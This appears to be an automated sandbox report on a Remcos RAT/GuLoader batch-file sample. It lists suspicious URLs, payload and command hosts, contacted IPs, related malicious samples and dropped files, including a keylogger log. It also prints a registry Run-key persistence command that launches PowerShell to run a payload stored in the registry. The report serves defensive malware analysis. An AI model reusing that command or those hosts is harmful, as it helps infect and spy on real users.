                                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://plieltd.top/?nmsiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.nirsoft.netmsiexec.exe, 00000012.00000002.2744526417.0000000002EA4000.00000004.00000010.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aefd.nelreports.net/api/report?cat=bingaotakbhv2369.tmp.18.drfalse
                                              unknown
                                              https://deff.nelreports.net/api/report?cat=msnbhv2369.tmp.18.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://evesecret.ma/Misforstaaelserne.psmXRdlpowershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://geoplugin.net/json.gp;msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://evesecret.ma/Misforstaaelserne.psmPpowershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.google.commsiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv2369.tmp.18.drfalse
                                                          unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv2369.tmp.18.drfalse
                                                            unknown
                                                            http://evesecret.mapowershell.exe, 00000002.00000002.2262684973.0000014F81D89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://contoso.com/powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://login.yahoo.com/config/loginmsiexec.exefalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.nirsoft.net/msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv2369.tmp.18.drfalse
                                                                  unknown
                                                                  https://www.office.com/bhv2369.tmp.18.drfalse
                                                                    unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.imvu.compDatamsiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://geoplugin.net/json.gpjmsiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://go.micropowershell.exe, 00000002.00000002.2262684973.0000014F80BB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://evesecret.mapowershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2262684973.0000014F818D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://geoplugin.net/json.gpomsiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.imvu.commsiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://aefd.nelreports.net/api/report?cat=wsbbhv2369.tmp.18.drfalse
                                                                                unknown
                                                                                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv2369.tmp.18.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://geoplugin.net/json.gpymsiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://plieltd.top/eYyaWC130.binEnmsiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://crl.micropowershell.exe, 00000005.00000002.2436956991.0000000007890000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://geoplugin.net/msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://aefd.nelreports.net/api/report?cat=bingaotbhv2369.tmp.18.drfalse
                                                                                          unknown
                                                                                          http://crl.mxpowershell.exe, 00000002.00000002.2297010038.0000014FF9539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://aefd.nelreports.net/api/report?cat=bingrmsbhv2369.tmp.18.drfalse
                                                                                              unknown
                                                                                              https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                unknown
                                                                                                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                104.21.56.189
                                                                                                plieltd.topUnited States
                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                37.230.62.86
                                                                                                evesecret.maUnited Kingdom
                                                                                                51059BRIGHTBOX-ASGBfalse
                                                                                                143.244.46.150
                                                                                                odinga.duckdns.orgUnited States
                                                                                                174COGENT-174UStrue
                                                                                                178.237.33.50
                                                                                                geoplugin.netNetherlands
                                                                                                8455ATOM86-ASATOM86NLfalse
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1543699
                                                                                                Start date and time:2024-10-28 09:21:08 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 10m 30s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:21
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:Lista produkt#U00f3w POL56583753Sarchmentdoc.bat
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:Lista produktw POL56583753Sarchmentdoc.bat
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.evad.winBAT@26/13@10/4
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 96%
                                                                                                • Number of executed functions: 160
                                                                                                • Number of non-executed functions: 276
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .bat
                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 2448 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 3796 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: Lista produkt#U00f3w POL56583753Sarchmentdoc.bat
                                                                                                TimeTypeDescription
                                                                                                04:22:03API Interceptor85x Sleep call for process: powershell.exe modified
                                                                                                04:22:38API Interceptor5352587x Sleep call for process: msiexec.exe modified
                                                                                                09:22:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Udstiller35 %Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)
                                                                                                09:22:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Udstiller35 %Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                104.21.56.189LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      143.244.46.150LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        178.237.33.50odthings.docGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        withbest.docGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                                        • geoplugin.net/json.gp
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        plieltd.topEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 172.67.155.139
                                                                                                        LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.56.189
                                                                                                        rEXSP5634HISP9005STMSDSDOKUME74247linierelet.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.56.189
                                                                                                        IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 172.67.155.139
                                                                                                        rIMG465244247443GULFORDEROpmagasinering.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 172.67.155.139
                                                                                                        rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 104.21.56.189
                                                                                                        geoplugin.netodthings.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        withbest.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                        • 178.237.33.50
                                                                                                        SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        BRIGHTBOX-ASGBla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 109.107.41.142
                                                                                                        http://steamplaytest.games/Get hashmaliciousUnknownBrowse
                                                                                                        • 5.83.218.104
                                                                                                        z73MSYWJ18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                        • 37.230.62.206
                                                                                                        z73MSYWJ18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                        • 37.230.62.206
                                                                                                        https://intralinks.us.com/B4Ga4RAtz014DCoTxB4GB4GQ3ElaQ3E4RAQ3E2APvpkg4RAoTxupz01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 37.230.62.219
                                                                                                        https://intralinks.us.com/jacekz01kryszkI1AewI1Acz2APvpkgroupz01coq01Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 37.230.62.219
                                                                                                        https://intralinks.us.com/chrI1Asz01vanm3Tuyl2APdermavanm3Tz01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 37.230.62.219
                                                                                                        https://intralinks.us.com/jallessI1Ae2APharrI1AsassoTxcz01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 37.230.62.219
                                                                                                        https://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 37.230.62.219
                                                                                                        4q7s5U3OBR.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 109.107.47.235
                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.170.64
                                                                                                        https://bitly.cx/NXacYGet hashmaliciousGRQ ScamBrowse
                                                                                                        • 188.114.97.3
                                                                                                        SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                        • 162.159.137.232
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 104.21.95.91
                                                                                                        nabppc.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 104.21.20.147
                                                                                                        jklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 104.19.61.123
                                                                                                        nklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.83
                                                                                                        jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 1.2.9.168
                                                                                                        http://delivery.aima.in/KUJABQ?id=12442=dkxVUwNRDAEFTQIMBlVXAlpcUABXUAlUW1BaUQMHCQQMB1RQBwAKAwMHUlMBVQsKAQ1KQ1IQSlQGdQtdWUFRG0VcGVIFUQENDgMABgcGBwdVAAUOTwpEQRIPTRxSUlxcQ1UXGhwCUVhWH15bGXhmeSN7ZwZaBkxDUQ==&fl=XUQRE0FZFxpUVFlBRFJfQw1LQlhfTFFHAV0HV0NUX1haXgwXQQtZG1hDUBtYVBxaDF1TQQBMWEEPWQ==Get hashmaliciousUnknownBrowse
                                                                                                        • 172.67.194.253
                                                                                                        #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        ATOM86-ASATOM86NLodthings.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        withbest.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        1730032807b4b05f98bfde8f6276448daba1a23755e9c274c194747a0e2092fa87b9491fd0424.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        43655- Urgent - Request for Quotation.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Supplier Purchase Order - PO0002491.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                        • 178.237.33.50
                                                                                                        SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        • 178.237.33.50
                                                                                                        #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                                        • 178.237.33.50
                                                                                                        COGENT-174USla.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 38.230.32.27
                                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.21.136.140
                                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 204.240.232.114
                                                                                                        nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 38.172.105.95
                                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 154.29.50.109
                                                                                                        splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 205.164.245.238
                                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 38.239.90.138
                                                                                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 38.54.122.172
                                                                                                        sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 149.94.84.207
                                                                                                        m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 38.124.37.25
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eXWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 37.230.62.86
                                                                                                        XWe8H4gRPb.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 37.230.62.86
                                                                                                        AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 37.230.62.86
                                                                                                        z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 37.230.62.86
                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                        • 37.230.62.86
                                                                                                        rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 37.230.62.86
                                                                                                        Remittance Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 37.230.62.86
                                                                                                        PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        • 37.230.62.86
                                                                                                        SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                        • 37.230.62.86
                                                                                                        SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 37.230.62.86
                                                                                                        37f463bf4616ecd445d4a1937da06e19RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        CQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        yt5xqAvHnZ.exeGet hashmaliciousVidarBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        17300406664afe7aec458893633a7734ab1b119dd638ebaf863f6f65e2e732ab9f2f071556149.dat-decoded.exeGet hashmaliciousZhark RATBrowse
                                                                                                        • 104.21.56.189
                                                                                                        • 37.230.62.86
                                                                                                        No context
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):162
                                                                                                        Entropy (8bit):3.3891986933246887
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:rhlKlM+XlxF4lrQ55JWRal2Jl+7R0DAlBG4moojklovDl6v:6lj8lE55YcIeeDAlS1gWAv
                                                                                                        MD5:6106D10158AF5774ACA3CA56DDB0A650
                                                                                                        SHA1:3A606B812CF707BCF43D0D17432971722A45EA1F
                                                                                                        SHA-256:DF702D5073A2EB60977616E034B26831B833F54283C858F6054EB9D4474B2584
                                                                                                        SHA-512:0A35FBE72E8D3655FE5CF90D2614CAD74B70292DE7E1F1BCBFD0A9A0E746C17AF0225FEBC4882E73861A9815C1737406243B51AA53CA9845B0A0CB82FD4D3131
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                        Preview:....[.2.0.2.4./.1.0./.2.8. .0.4.:.2.2.:.5.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):956
                                                                                                        Entropy (8bit):5.01627908168741
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:tkTLJwnd6CsGkMyGWKyGXPVGArwY3AoQasHuGvB+Arpv/mOAaNO+ao9W7iN5zzkq:qpQdRNuKyGX85MEBZvXhNlT3/7l1DYro
                                                                                                        MD5:D92AD52DC2DD1904BEF7A9EC3720E62F
                                                                                                        SHA1:555F15C351124CAF588ABA8A09FB80F03B86D09A
                                                                                                        SHA-256:809CED4F5FE979A9D2FA61F9EF7B5EF821304A98BCF7CF39ACCE271D9769AB92
                                                                                                        SHA-512:69EC28B7A27001A1F63C87AFB6E8905E6AC519318BC9A278BF30491FFB4836A9B64E6BF574DE54CF522E14C1670CB75829DF1CD0FF627F42B6B2A63C15048B1F
                                                                                                        Malicious:false
                                                                                                        Preview:{. "geoplugin_request":"155.94.241.188",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Dallas",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"623",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"32.8137",. "geoplugin_longitude":"-96.8704",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):8003
                                                                                                        Entropy (8bit):4.840877972214509
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                                        MD5:106D01F562D751E62B702803895E93E0
                                                                                                        SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                                        SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                                        SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                                        Malicious:false
